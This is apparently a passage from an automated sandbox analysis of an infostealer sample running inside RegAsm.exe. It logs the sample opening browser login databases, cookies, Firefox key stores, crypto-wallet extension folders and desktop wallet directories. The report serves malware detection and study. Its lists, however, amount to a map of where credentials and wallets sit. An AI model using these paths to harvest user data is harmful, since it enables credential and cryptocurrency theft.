                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipb
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                    Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: WyPb2uVZ1P.exe, 00000000.00000003.2169346203.0000000006620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
